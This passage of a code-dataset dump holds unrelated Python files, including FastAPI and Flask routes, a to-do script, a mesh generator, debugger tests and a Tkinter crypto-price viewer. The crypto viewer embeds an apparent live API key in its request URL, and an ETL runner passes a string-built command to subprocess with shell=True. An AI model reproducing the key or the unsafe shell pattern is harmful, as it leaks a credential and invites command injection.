here\n\nbanner()\nbank()\n","sub_path":"BankingApplication.py","file_name":"BankingApplication.py","file_ext":"py","file_size_in_byte":3653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"22236978","text":"import logging\nfrom operator import attrgetter\nfrom typing import Callable, List\n\nfrom fastapi import APIRouter, Depends, HTTPException, status\nfrom httpx import HTTPStatusError\nfrom pydantic import ValidationError\nfrom pydantic.errors import PydanticValueError\n\nfrom ...models.schemas.solvers import Solver, SolverKeyId, VersionStr\nfrom ...modules.catalog import CatalogApi\nfrom ..dependencies.application import get_reverse_url_mapper\nfrom ..dependencies.authentication import get_current_user_id\nfrom ..dependencies.services import get_api_client\n\nlogger = logging.getLogger(__name__)\n\nrouter = APIRouter()\n\n\n## SOLVERS -----------------------------------------------------------------------------------------\n#\n# - TODO: pagination, result ordering, filter field and results fields?? SEE https://cloud.google.com/apis/design/standard_methods#list\n# - TODO: :search? 
SEE https://cloud.google.com/apis/design/custom_methods#common_custom_methods\n# - TODO: move more of this logic to catalog service\n# - TODO: error handling!!!\n# - TODO: allow release_tags instead of versions in the next iteration.\n# Would be nice to have /solvers/foo/releases/latest or solvers/foo/releases/3 , similar to docker tagging\n\n\n@router.get(\"\", response_model=List[Solver])\nasync def list_solvers(\n user_id: int = Depends(get_current_user_id),\n catalog_client: CatalogApi = Depends(get_api_client(CatalogApi)),\n url_for: Callable = Depends(get_reverse_url_mapper),\n):\n \"\"\" Lists all available solvers (latest version) \"\"\"\n solvers: List[Solver] = await catalog_client.list_latest_releases(user_id)\n\n for solver in solvers:\n solver.url = url_for(\n \"get_solver_release\", solver_key=solver.id, version=solver.version\n )\n\n return sorted(solvers, key=attrgetter(\"id\"))\n\n\n@router.get(\"/releases\", response_model=List[Solver], summary=\"Lists All Releases\")\nasync def list_solvers_releases(\n user_id: int = Depends(get_current_user_id),\n catalog_client: CatalogApi = Depends(get_api_client(CatalogApi)),\n url_for: Callable = Depends(get_reverse_url_mapper),\n):\n \"\"\" Lists all released solvers (all released versions) \"\"\"\n assert await catalog_client.is_responsive() # nosec\n\n solvers: List[Solver] = await catalog_client.list_solvers(user_id)\n\n for solver in solvers:\n solver.url = url_for(\n \"get_solver_release\", solver_key=solver.id, version=solver.version\n )\n\n return sorted(solvers, key=attrgetter(\"id\", \"pep404_version\"))\n\n\n@router.get(\n \"/{solver_key:path}/latest\",\n response_model=Solver,\n summary=\"Get Latest Release of a Solver\",\n)\nasync def get_solver(\n solver_key: SolverKeyId,\n user_id: int = Depends(get_current_user_id),\n catalog_client: CatalogApi = Depends(get_api_client(CatalogApi)),\n url_for: Callable = Depends(get_reverse_url_mapper),\n) -> Solver:\n \"\"\" Gets latest release of a solver \"\"\"\n # IMPORTANT: by adding /latest, we avoid changing the order of this entry in the router list\n # otherwise, {solver_key:path} will override and consume any of the paths that follow.\n try:\n\n solver = await catalog_client.get_latest_release(user_id, solver_key)\n solver.url = url_for(\n \"get_solver_release\", solver_key=solver.id, version=solver.version\n )\n assert solver.id == solver_key # nosec\n\n return solver\n\n except (KeyError, HTTPStatusError, IndexError) as err:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"Solver with id={solver_key} not found\",\n ) from err\n\n\n@router.get(\"/{solver_key:path}/releases\", response_model=List[Solver])\nasync def list_solver_releases(\n solver_key: SolverKeyId,\n user_id: int = Depends(get_current_user_id),\n catalog_client: CatalogApi = Depends(get_api_client(CatalogApi)),\n url_for: Callable = Depends(get_reverse_url_mapper),\n):\n \"\"\" Lists all releases of a given solver \"\"\"\n releases: List[Solver] = await catalog_client.list_solver_releases(\n user_id, solver_key\n )\n\n for solver in releases:\n solver.url = url_for(\n \"get_solver_release\", solver_key=solver.id, version=solver.version\n )\n\n return sorted(releases, key=attrgetter(\"pep404_version\"))\n\n\n@router.get(\"/{solver_key:path}/releases/{version}\", response_model=Solver)\nasync def get_solver_release(\n solver_key: SolverKeyId,\n version: VersionStr,\n user_id: int = Depends(get_current_user_id),\n catalog_client: CatalogApi = Depends(get_api_client(CatalogApi)),\n 
url_for: Callable = Depends(get_reverse_url_mapper),\n) -> Solver:\n \"\"\" Gets a specific release of a solver \"\"\"\n try:\n solver = await catalog_client.get_solver(user_id, solver_key, version)\n\n solver.url = url_for(\n \"get_solver_release\", solver_key=solver.id, version=solver.version\n )\n\n return solver\n\n except (\n ValueError,\n IndexError,\n ValidationError,\n HTTPStatusError,\n PydanticValueError,\n ) as err:\n raise HTTPException(\n status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"Solver {solver_key}:{version} not found\",\n ) from err\n","sub_path":"services/api-server/src/simcore_service_api_server/api/routes/solvers.py","file_name":"solvers.py","file_ext":"py","file_size_in_byte":5210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"171524961","text":"to_do = []\n\nuser_input = \"\"\n\nwhile user_input != \"q\":\n\n if user_input == \"1\":\n title = input(\"Enter title: \")\n priority = input(\"Enter high, medium, or low: \")\n \n my_tasks = {\n \"title\": title,\n \"priority\": priority\n }\n\n to_do.append(my_tasks)\n print(to_do)\n\n elif user_input == \"3\":\n\n for index in range(0, len(to_do)):\n result = to_do[index]\n print(f\"{index +1} - {result['title']} - {result['priority']}\")\n \n elif user_input == \"2\":\n\n for index in range(0, len(to_do)):\n result = to_do[index]\n print(f\"{index +1} - {result['title']} - {result['priority']}\")\n \n delete_task = int(input(\"Enter the number of the task you would like to delete: \"))\n \n def task_to_delete():\n del to_do[delete_task -1]\n \n task_to_delete()\n\n user_input = input(\"Press 1 to add a task, press 2 to delete a task, press 3 to view all tasks, and press q to quit! \")","sub_path":"to_do_list.py","file_name":"to_do_list.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"139266153","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nimport os\nimport subprocess\nimport json\n\n\ndef read_data_conf(cfg):\n return json.load(open(cfg, 'r'))\n\n\ndef runtask(key, task_path, date_str):\n command_str = \"cd %s && runtask -d%s \" % (task_path, date_str)\n print(command_str)\n retcode = subprocess.check_call(command_str, shell=True)\n print(key + \" return code : \" + str(retcode))\n\n\ndef itemsly():\n date_str = '20180701'\n data_conf = read_data_conf('tm1Task.json')\n for (key, value) in data_conf.items():\n task_path = os.path.join('%s/%s' % (\"/home/q/www/dc-data-etl/etl_task/dwd/tm/task\", value[\"path\"]))\n runtask(key, task_path, date_str)\n\n\nif __name__ == '__main__':\n itemsly()\n","sub_path":"shangrila 部分执行脚本/tm1_task/runTaskByJson.py","file_name":"runTaskByJson.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"481850045","text":"import tkinter as tk\nfrom PIL import ImageTk\nimport urllib.request\nimport webbrowser\nimport json\nroot = tk.Tk()\n\nurl = \"https://api.nomics.com/v1/currencies/ticker?key=9d876aa144dc791bff11cb5b07a01d3d&\" \\\n \"ids=BTC,ETH,XRP&interval=1d,30d&convert=USD\"\n\n\nclass nomics_api:\n\n def crypto_json(self, url):\n return urllib.request.urlopen(url).read()\n\n def conv_object(self):\n obj = json.loads(nomics.crypto_json(url))\n return json.dumps(obj, indent=2)\n\n\nnomics = nomics_api()\n\n\ndef link():\n return webbrowser.open(\"https://cryptowat.ch\")\n\n\nFILENAME = 
r\"C:\\Users\\HP\\stockimage.jpg\"\nroot.title('CRYPTO_PRICE_IN_REAL_TIME')\nroot.geometry(\"780x439\")\ncanvas = tk.Canvas(root, width=700, height=439)\ncanvas.pack()\ntk_img = ImageTk.PhotoImage(file=FILENAME)\ncanvas.create_image(125, 125, image=tk_img)\nquit_button = tk.Button(root, text=\"Quit\", command=root.quit, bg=\"red\")\nquit_button_window = canvas.create_window(450, 300, anchor='nw', window=quit_button)\n\nweb_link = tk.Button(root, text=\"visit CRYPTO WATCH\", command=link, anchor='w', width=30, bg=\"green\")\nweb_link_window = canvas.create_window(290, 10, anchor='nw', window=web_link)\n\n\ndef live_price():\n st = json.loads(nomics.crypto_json(url))\n\n btc_cap = tk.Label(root, text=\"BTC MARKET-CAP : \" + \"\\r\" + st[0]['market_cap'] + \" USD\")\n canvas.create_window(10, 80, anchor='nw', window=btc_cap)\n\n eth_cap = tk.Label(root, text=\"ETH MARKET-CAP : \" + \"\\r\" + st[1]['market_cap'] + \" USD\")\n canvas.create_window(10, 150, anchor='nw', window=eth_cap)\n\n btc_price = tk.Label(root, text=\"BTC PRICE: \" + \"\\r\" + st[0]['price'] + \" USD\")\n canvas.create_window(400, 80, anchor='nw', window=btc_price)\n\n eth_price = tk.Label(root, text=\"ETH PRICE: \" + \"\\r\" + st[1]['price'] + \" USD\")\n canvas.create_window(400, 150, anchor='nw', window=eth_price)\n\n time_stamp = tk.Label(root, text=\"DATE : \" + st[1]['price_timestamp'])\n canvas.create_window(200, 330, anchor='nw', window=time_stamp)\n root.after(1000, live_price)\n\n\nlive_price()\nroot.mainloop()\n\n\n\n\n\n","sub_path":"CRYPTO.py","file_name":"CRYPTO.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"418138830","text":"from flask import request\nfrom flask_restplus import Namespace, Resource, fields\n\nfrom rpsls_api.commons import scoreboard_helper, schemas\n\nfrom rpsls_api.models import Scoreboard\nfrom rpsls_api.extensions import db\n\napi = Namespace('scoreboard', description='Scoreboard related operations')\n\n\nreset_scoreboard_fields = api.model('ResetScoreboardFields', {\n 'username': fields.String(required=True)\n})\n\nscoreboard_fields = api.model('ScoreboardFields', {\n 'username': fields.String(required=True),\n 'result': fields.String(required=True, description=\"Result of a play\")\n})\n\n\n@api.route(\"\")\nclass ScoreboardResource(Resource):\n\n @api.expect(scoreboard_fields, validate=True)\n def post(self):\n \"\"\"\n record play result\n \"\"\"\n body = request.get_json()\n username = body.get(\"username\")\n result = body.get(\"result\")\n\n if result == \"win\":\n score = Scoreboard(\n username=username,\n win=1,\n lose=0,\n tie=0\n )\n db.session.add(score)\n elif result == \"lose\":\n score = Scoreboard(\n username=username,\n win=0,\n lose=1,\n tie=0\n )\n db.session.add(score)\n elif result == \"tie\":\n score = Scoreboard(\n username=username,\n win=0,\n lose=0,\n tie=1\n )\n db.session.add(score)\n else:\n return {\"error\": \"Result not valid.\"}, 400 \n\n try:\n db.session.commit()\n return {\"error\": None}\n except Exception as e:\n db.session.rollback()\n return {\"error\": \"Error recording this play. 
Reason {}\".format(e.args)}, 400\n\n\n@api.route(\"/stats\")\nclass UserStatResource(Resource):\n\n query_parser = api.parser()\n query_parser.add_argument('username', required=True, location='args', type=str)\n\n @api.expect(query_parser, validate=True)\n def get(self, query_parser=query_parser):\n \"\"\"\n returns win/lose/tie stat of a user\n \"\"\"\n args = query_parser.parse_args()\n username = args['username']\n stats = scoreboard_helper.get_user_stats(username)\n if stats:\n return stats\n else:\n return {\n \"win\": 0,\n \"lose\": 0,\n \"tie\": 0\n }\n\n\n@api.route(\"/list\")\nclass ScoreboardListResource(Resource):\n\n query_parser = api.parser()\n query_parser.add_argument('username', required=True, location='args', type=str)\n query_parser.add_argument('limit', required=True, location='args', type=int)\n\n @api.expect(query_parser, validate=True)\n def get(self, query_parser=query_parser):\n \"\"\"\n return most recent results\n \"\"\"\n args = query_parser.parse_args()\n username = args['username']\n limit = args['limit']\n\n scoreboard_query = (\n Scoreboard.query.filter_by(username=username)\n .order_by(Scoreboard.create_time.desc())\n .limit(limit).all()\n )\n\n schema = schemas.ScoreboardSchema(many=True)\n\n return schema.dump(scoreboard_query).data\n\n @api.expect(reset_scoreboard_fields, validate=True)\n def delete(self):\n \"\"\"\n deletes user play history\n \"\"\"\n body = request.get_json()\n username = body.get(\"username\")\n\n Scoreboard.query.filter_by(username=username).delete()\n\n try:\n db.session.commit()\n return {\"error\": None}\n except Exception as e:\n db.session.rollback()\n return {\"error\": \"error resetting scoreboard. Reason {}\".format(e.args)}, 400\n","sub_path":"rpsls_api/api/namespaces/scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":3781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"65010778","text":"#!/Users/dtseidl/anaconda/bin/python\n\nimport sys, os\nimport numpy as np\nimport pickle\n# must build trilinos with shared libs\n# for import to be successful\nsys.path.append(\"/Users/dtseidl/local2/trilinos-seacas/lib\")\nfrom exodus import exodus\n\nnoise_level = 2 # 2% noise \ndata_level = \"dp1\" # dr, dp1, dp2 -- data rich/poor1/poor2\n# dp1 and dp2 have different sparsity patterns\nu_rms = np.loadtxt(\"u_rms.dat\")\na = float(noise_level)/100*u_rms # standard deviation of measurement noise\n# u_rms computed from paraview filter (u = u_y here)\n#np.savetxt(\"noise_std.dat\",np.array([a]))\n#np.savetxt(\"noise_var.dat\",np.array([a**2]))\nnp.random.seed(204)\n\n# load sensor data\nsensor_data = pickle.load( open( \"sensor_data.p\", \"rb\") )\n\nmfile = \"input_mesh_\" + data_level + \"_n\" + str(noise_level) + \".exo\"\nrm_output=True\nif (rm_output):\n os.system(\"rm \" + mfile)\n# mesh parameters\ndim = 2\nLx = 1.0\nLy = 1.0\nNx = 20\nNy = 20\ncoord_names = [\"x\", \"y\"]\nnblocks = 1\nnnode_sets = 0\nnside_sets = 4\nside_set_names = [\"bottom\", \"right\", \"top\", \"left\"]\nnblocks = 1\nstep = 1\nt = 0.0\nblkid = 1\nblk_name = \"eblock-0_0\"\nelem_type = \"QUAD4\"\nnnode_per_elem = 4\nnattr_per_elem = 0\n# derived quantities\ndx = Lx/Nx\ndy = Ly/Ny\nnx = np.linspace(0,Lx,Nx+1)\nny = np.linspace(0,Ly,Ny+1)\nnz = np.zeros(nx.shape)\nnnodes = (Nx+1)*(Ny+1)\nnelem = Nx*Ny\n# measurement noise\nmeas_noise_1 = np.random.normal(0.0,a,nelem)\nmeas_noise_2 = np.random.normal(0.0,a,nelem)\n# optional title\nmtitle=\"mesh\"\n# open new file for 
writing\nmesh = exodus(mfile, mode='w', array_type=\"numpy\", title=mtitle,\n numDims=dim, numNodes=nnodes, numElems=nelem,\n numBlocks=nblocks, numNodeSets=nnode_sets, numSideSets=nside_sets)\n# time and block info\nmesh.put_time(step,t)\nmesh.put_elem_blk_info(blkid,elem_type,nelem,nnode_per_elem,nattr_per_elem)\nmesh.put_elem_blk_name(blkid,blk_name)\n# coordinates\nmesh.put_coord_names(coord_names)\nnode_map = range(1,nnodes+1)\nmesh.put_node_id_map(node_map)\ncx = np.empty(nnodes)\ncy = np.empty(nnodes)\ncz = np.zeros(nnodes)\nn = 0\nfor ycoor in ny:\n for xcoor in nx:\n cx[n] = xcoor\n cy[n] = ycoor\n n += 1\nmesh.put_coords(cx,cy,cz)\n# connectivity\nconn_array = np.empty(nelem*nnode_per_elem,dtype=int)\nspatial_node_map = np.empty((Ny+1,Nx+1),dtype=int)\nn = 1\nfor ey in range(Ny+1):\n for ex in range(Nx+1):\n spatial_node_map[ey,ex] = n\n n += 1\ncindex = 0\nfor ey in range(Ny):\n for ex in range(Nx):\n econn = [spatial_node_map[ey,ex], spatial_node_map[ey,ex+1],\n spatial_node_map[ey+1,ex+1], spatial_node_map[ey+1,ex]]\n for n in range(nnode_per_elem):\n conn_array[cindex] = econn[n]\n cindex += 1\nmesh.put_elem_connectivity(blkid,conn_array)\n# side sets\nspatial_elem_map = np.empty((Ny,Nx),dtype=int)\ne = 1\nfor ey in range(Ny):\n for ex in range(Nx):\n spatial_elem_map[ey,ex] = e\n e += 1\nbottom_elems = spatial_elem_map[0,:]\nright_elems = spatial_elem_map[:,-1]\ntop_elems = spatial_elem_map[-1,:]\nleft_elems = spatial_elem_map[:,0]\nmesh.put_side_set_params(1,Nx,0)\nmesh.put_side_set_params(2,Ny,0)\nmesh.put_side_set_params(3,Nx,0)\nmesh.put_side_set_params(4,Ny,0)\nmesh.put_side_set(1,bottom_elems,np.ones(bottom_elems.shape,dtype=int))\nmesh.put_side_set(2,right_elems,2*np.ones(right_elems.shape,dtype=int))\nmesh.put_side_set(3,top_elems,3*np.ones(top_elems.shape,dtype=int))\nmesh.put_side_set(4,left_elems,4*np.ones(left_elems.shape,dtype=int))\nmesh.put_side_set_names(side_set_names)\n\n# names of element fields\nenames = [\"numSensors\", \"sensor_1_Loc_x\", \"sensor_1_Loc_y\", \"sensor_1_Val_1\", \"sensor_1_Val_2\"]\nedata = {}\nfullSensors = np.ones((Ny,Nx))\nsparseSensors = np.zeros((Ny,Nx))\n# edit to change sensor placement\nif data_level == \"dr\":\n edata[\"numSensors\"] = fullSensors.flatten()\nelse:\n if data_level == \"dp1\":\n pattern = np.array([2, 5, 8, 11, 14, 17])\n elif data_level == \"dp2\":\n pattern = np.array([1, 5, 9, 13, 17])\n sparseSensors[:,pattern] = 1\n edata[\"numSensors\"] = sparseSensors.flatten()\n \n \nedata[\"sensor_1_Loc_x\"] = sensor_data[\"xCoor\"]\nedata[\"sensor_1_Loc_y\"] = sensor_data[\"yCoor\"]\n# add noise here\nedata[\"sensor_1_Val_1\"] = sensor_data[\"d_x\"] + meas_noise_1\nedata[\"sensor_1_Val_2\"] = sensor_data[\"d_y\"] + meas_noise_2\n\n# add element variables\nelemvars = len(enames)\nmesh.set_element_variable_number(elemvars)\nfor i in range(elemvars):\n ind = i + 1\n mesh.put_element_variable_name(enames[i],ind)\n mesh.put_element_variable_values(blkid,enames[i],step,edata[enames[i]])\n\nmesh.close()\n\n# for Bayesian inversion with Dakota ...\n#if data_level == \"dr\":\n# np.savetxt(\"exp_data_\" + data_level + \"_n\" + str(noise_level), \\\n# np.append(edata[\"sensor_1_Val_2\"], a**2*np.ones(meas_noise.shape)), \\\n# newline=\" \")\n#else:\n# inds = np.nonzero(sparseSensors.flatten())[0]\n# np.savetxt(\"exp_data_\" + data_level + \"_n\" + str(noise_level), \\\n# np.append(edata[\"sensor_1_Val_2\"][inds], a**2*np.ones(inds.size)), \\\n# newline=\" \")\n\n 
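\n# optional sanity check (minimal sketch; uses only names defined earlier in this script):\n# with nelem = Nx*Ny = 400 draws, the sample std of the injected Gaussian noise\n# should land within a few percent of the target value a\nprint('target noise std: %.6g' % a)\nprint('sample noise std: %.6g / %.6g' % (np.std(meas_noise_1), np.std(meas_noise_2)))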
\n\n","sub_path":"regression/le/2d_sparse_simul_inversion/create_mesh_2d.py","file_name":"create_mesh_2d.py","file_ext":"py","file_size_in_byte":4916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"637454132","text":"import numpy as np\nimport pandas as pd\n\ndef error_rate(l):\n l = l[20:80]\n max_v = l[len(l)-1]\n min_v = l[0]\n diff = (max_v - min_v) / 2\n avg = np.mean(l)\n error_v = diff / avg\n return round(error_v*100,2)\n\n\ndirectory = \"Misure/\"\nmaterials = [\"Legno\",\"Vetro\",\"Plastica\",\"Ferro\",\"Carta\"]\ndistance = [str(i) for i in range(5,45,5)]\ndict = {}\nfor m in materials:\n errorList = []\n for d in distance:\n mList = []\n file = directory + m + \"-\" + d + \".csv\"\n data = pd.read_csv(file) \n mList = list(data['Misura'])\n errorList.append(error_rate(mList))\n dict[m] = errorList\n\ndf = pd.DataFrame(dict,[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\"])\n\ndf.to_csv(\"ErrorRate.csv\", encoding='utf-8', index=False)\n","sub_path":"ScriptTestMisure/graphics.py","file_name":"graphics.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"413907693","text":"#! /usr/bin/env python\n# -*- coding: iso-8859-15 -*-\n##############################################################################\n# Copyright 2003 & onward LASMEA UMR 6602 CNRS/Univ. Clermont II\n# Copyright 2009 & onward LRI UMR 8623 CNRS/Univ Paris Sud XI\n#\n# Distributed under the Boost Software License, Version 1.0\n# See accompanying file LICENSE.txt or copy at\n# http://www.boost.org/LICENSE_1_0.txt\n##############################################################################\n\n\n\"\"\"update of units syntax : transitionnal\n\"\"\"\n__author__ = \"Lapreste Jean-thierry (lapreste@univ-bpclermont.fr)\"\n__version__ = \"$Revision: 1.0 $\"\n__date__ = \"$Date: 2010 $\"\n__copyright__ = \"\"\" Copyright 2003 & onward LASMEA UMR 6602 CNRS/Univ. 
Clermont II\n Copyright 2009 & onward LRI UMR 8623 CNRS/Univ Paris Sud XI\"\"\"\n__license__ = \"Boost Software License, Version 1.0\"\n\nimport os\nimport sys\nsys.path.insert(0,os.path.join(os.path.dirname(os.path.realpath(__file__)),'..',\"utils\"))\nsys.path.insert(0,os.path.join(os.path.dirname(os.path.realpath(__file__)),'..',\"nt2_basics\"))\nimport datetime\nimport shutil\nimport re\nimport string\nfrom datetime import datetime\nfrom files_utils import write, exist, read\nfrom nt2_base_infos import Nt2_base_infos\nfrom pprint import PrettyPrinter\nfrom nt2_tb_props import Nt2_tb_props\nfrom nt2_fct_props import Nt2_fct_props\nfrom nt2_fct_internals import Nt2_fct_internals\nfrom modify_base import Modify_base\nsys.path.pop(0)\nsys.path.pop(0)\n\nDispatch_Txt = \"\"\" NT2_REGISTER_DISPATCH(tag::%(name)s%(tpl1)s_, tag::cpu_,\n%(blanks)s %(list_A)s, \n%(blanks)s %(tag_list_A)s\n%(blanks)s )\n\"\"\"\n \nNew_Call = \"\"\" template<%(tpl)sclass Dummy>\n struct call : callable\"\"\" \n\n\nclass Nt2_update_scalar_unit(Nt2_fct_props) :\n def __init__(self, tb_name, fct_name) :\n Nt2_fct_props.__init__(self, tb_name, fct_name)\n\n def duplicate_unit(self) :\n pin = self.get_fct_unit_path('scalar')\n pout = pin+'.old'\n Modify_base.duplicate(pin,pout)\n\n def restore_unit(self) :\n pout = self.get_fct_unit_path('scalar')\n pin = pout+'.old'\n Modify_base.restore(pin,pout)\n\n def modify_unit(self,tryonly='tryonly') :\n \"\"\" text is always modified from old one\"\"\"\n style = self.get_tb_style()\n tb_name = self.get_tb_name()\n fct_name = self.get_fct_name()\n print(\"modifying fct for %s with style %s\"% (self.get_fct_name(),style))\n new = self.get_fct_unit_path('scalar')\n old = new+'.old'\n if not exist(new) :\n print(\"%s does not exist\" % new)\n return\n if not exist(old) : self.duplicate_unit()\n oldtxt = read(old)\n newtxt = self.replacements(oldtxt,'\\t',' ')\n pattern = ('nt2::functors' if style =='sys' else 'nt2::'+tb_name)\n rep = ('nt2::tag' if style =='sys' else pattern+'::tag')\n pattern = pattern+'::'+fct_name+'_'\n rep = rep + '::'+fct_name+'_'\n newtxt = self.replacements(newtxt,pattern,rep)\n \n## newtxt = self.replacements(oldtxt,'\\sNT2_CALL_RETURN_TYPE\\(',' NT2_RETURN_TYPE(')\n if tryonly != 'tryonly' :\n write(new,newtxt,False)\n else :\n print(\"===============\")\n PrettyPrinter().pprint(newtxt)\n print(\"===============\")\n\n def replacements(self, txt, orig, rep) :\n return [ re.sub(orig,rep,s) for s in txt]\n \n\nif __name__ == \"__main__\" :\n nud = Nt2_update_scalar_unit(\"cephes\",\"acos\")\n print(\"ok\")\n nud.modify_unit()#\"vas-y\")\n","sub_path":"scriptpython/py_py/nt2_updating/nt2_update_units.py","file_name":"nt2_update_units.py","file_ext":"py","file_size_in_byte":3864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"396462835","text":"import madbg\nfrom unittest.mock import Mock\nfrom pytest import raises\n\nfrom madbg.debugger import RemoteIPythonDebugger\n\nfrom .utils import run_in_process, run_script_in_process, JOIN_TIMEOUT, run_client\n\n\ndef set_trace_script(port):\n madbg.set_trace(port=port)\n\n\ndef set_trace_and_expect_var_to_change_script(port) -> bool:\n \"\"\"\n Set two vars to the same value, start the debugger, and return True if one of the vars has changed.\n \"\"\"\n original_value = value_to_change = 0\n madbg.set_trace(port=port)\n return original_value != value_to_change\n\n\ndef test_set_trace(port, start_debugger_with_ctty):\n debugger_future = 
run_script_in_process(set_trace_and_expect_var_to_change_script, start_debugger_with_ctty, port)\n client_future = run_in_process(run_client, port, b'value_to_change += 1\\nc\\n')\n assert debugger_future.result(JOIN_TIMEOUT)\n client_output = client_future.result(JOIN_TIMEOUT)\n assert b'Closing connection' in client_output\n\n\ndef test_set_trace_and_quit_debugger(port, start_debugger_with_ctty):\n debugger_future = run_script_in_process(set_trace_script, start_debugger_with_ctty, port)\n client_future = run_in_process(run_client, port, b'q\\n')\n debugger_future.result(JOIN_TIMEOUT)\n client_future.result(JOIN_TIMEOUT)\n\n\ndef test_set_trace_with_failing_debugger(port, start_debugger_with_ctty, monkeypatch):\n monkeypatch.setattr(RemoteIPythonDebugger, '__init__', Mock(side_effect=lambda *a, **k: 1 / 0))\n debugger_future = run_script_in_process(set_trace_script, start_debugger_with_ctty, port)\n client_future = run_in_process(run_client, port, b'bla\\n')\n with raises(ZeroDivisionError):\n debugger_future.result(JOIN_TIMEOUT)\n client_output = client_future.result(JOIN_TIMEOUT)\n assert ZeroDivisionError.__name__.encode() in client_output\n","sub_path":"tests/system/test_set_trace.py","file_name":"test_set_trace.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"84642564","text":"from rest_framework.exceptions import APIException\nfrom rest_framework.views import exception_handler as default_exception_handler\n\n\nclass Conflict(APIException):\n status_code = 409\n default_code = 'conflict'\n default_detail = 'Resource is occupied.'\n\n\ndef exception_handler(exc, context):\n \"\"\"Custom API exception handler which unwraps the exception details from JSON \"detail\" value.\"\"\"\n response = default_exception_handler(exc, context)\n if response is not None:\n response.content = str(exc.detail)\n return response\n","sub_path":"backend/api/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"258237677","text":"from random import randint\n\n## Implementing Bubble sort. 
The simplest sorting algorithm.\n\ndef check_sorted(arr):\n temp = arr[0]\n for i in arr:\n if i < temp:\n return False\n temp = i\n return True\n\n\ndef bubble_sort(arr):\n for i in range(len(arr), 0, -1):\n for j in range(i - 1):\n if arr[j] > arr[j + 1]:\n temp = arr[j]\n arr[j] = arr[j + 1]\n arr[j + 1] = temp\n\n\nmylist = []\n\nfor i in range(20):\n mylist.append(randint(1, 100))\n\nprint(\"The sorted flag is {} and list is \\n{},\".format(check_sorted(mylist), mylist))\n\nbubble_sort(mylist)\n\nprint(\"The sorted flag is {} and list is \\n{},\".format(check_sorted(mylist), mylist))\n\n#ok \n","sub_path":"com/ishaan/python/Algo_Sorting/sort_bubble.py","file_name":"sort_bubble.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"509494872","text":"\"\"\"\nDefines all common formatting methods\n\"\"\"\nimport collections as col\n\ndef prepare_tuple(item, var_name=\"\", obj_type=float, div_factor=100):\n \"\"\"\n Cast a tuple to appropriate types.\n\n :param item: tuple\n :param str var_name: variable name\n :param type obj_type: object type cast\n :param float div_factor: value division factor\n :return: correct tuple\n \"\"\"\n if isinstance(item, col.Iterable) and not isinstance(item, str):\n item = tuple(map(lambda t: obj_type(obj_type(t) / div_factor), item))\n elif isinstance(item, float) or isinstance(item, int):\n item = (obj_type(obj_type(item) / div_factor),) * 4\n elif isinstance(item, str):\n item = tuple(map(lambda t: obj_type(obj_type(t) / div_factor),\n item.strip(\"(\").strip(\")\").split(\",\")))\n if len(item) == 1:\n item *= 4\n else:\n raise TypeError(f\"Invalid {var_name if var_name else 'object'} type.\")\n return item\n","sub_path":"misc/preformat.py","file_name":"preformat.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"360045331","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def revtrav(self,root):\n if not root:return\n root.left,root.right=root.right,root.left\n self.revtrav(root.left)\n self.revtrav(root.right)\n return root\n #def trav(self,root):\n \n def isSymmetric(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: bool\n \"\"\"\n if not root:return True\n chleft=self.revtrav(root.left)\n def trav(a,b):\n if not a and not b :return True\n if not a or not b:return False\n flag=False\n if a.val==b.val:\n flag=True\n return flag and trav(a.left,b.left) and trav(a.right,b.right)\n return trav(chleft,root.right)\n \n","sub_path":"101.py","file_name":"101.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"153824951","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport json\nimport ast\nfrom amp.config import BaseConfig\nfrom sqlalchemy.sql import null\nfrom flask import Blueprint, render_template, send_from_directory, request, \\\n current_app, flash, redirect, url_for\nfrom flask_login import login_user, current_user, logout_user\nfrom flask_restful import Api, Resource\nfrom flask_api import status\nfrom sqlalchemy.exc import IntegrityError\nfrom werkzeug.exceptions import HTTPException\nfrom werkzeug.utils import secure_filename\nfrom .forms import SelectAssetManagementReport\nfrom werkzeug.wrappers import Response\nfrom 
